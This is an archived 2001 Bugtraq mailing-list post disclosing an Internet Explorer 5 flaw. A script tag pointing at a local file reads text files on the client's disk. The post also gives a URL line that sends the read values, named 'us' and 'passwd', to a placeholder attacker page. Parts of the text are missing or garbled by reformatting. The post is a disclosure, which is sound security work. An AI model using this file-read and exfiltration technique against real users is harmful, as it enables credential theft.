mailing list archives
RE: security bug Internet Explorer 5
From: Stefaan Deman <Stefaan.Deman () compex be>
Date: Fri, 8 Jun 2001 10:33:38 +0200
I noticed that my previous mail was strangly reformatted. I guess Outlook
tried to outsmart me again.
The script tag should be
From: Stefaan Deman [mailto:Stefaan.Deman () compex be]
Sent: Wednesday, June 06, 2001 10:27 AM
To: 'bugtraq () securityfocus com'
Subject: security bug Internet Explorer 5
There is a security bug in the Internet Explorer 5 (I haven't tested it on
It is possible to read some textfiles (others than cookies) from the
client's hard disk.
If there is for example in the directory 'C:\WINNT' a textfile 'test.txt'
then it is possible to read this file in an HTML page with the tag:
<script src=" <file:///C:/WINNT/test.txt>
The HTML page will consider the file as a script and us and passwd will be
considered as variables
in the previous example.
It is then possible to use this information or send this (possible critical)
information back to the
webserver with for example
http://myurl/myasppage.asp?us=" + escape(us) + ";passwd=" + escape(passwd),
This is a security bug, it should be impossible to read any file on the
client's file system.
the filename should be known.
However, it is easy to image how this security hole can be misused.
This bug isn't as severe as the one posted by Guninski (
The difference between this bug and the one of Guninski is that this
security hole doesn't make use of
Active X components.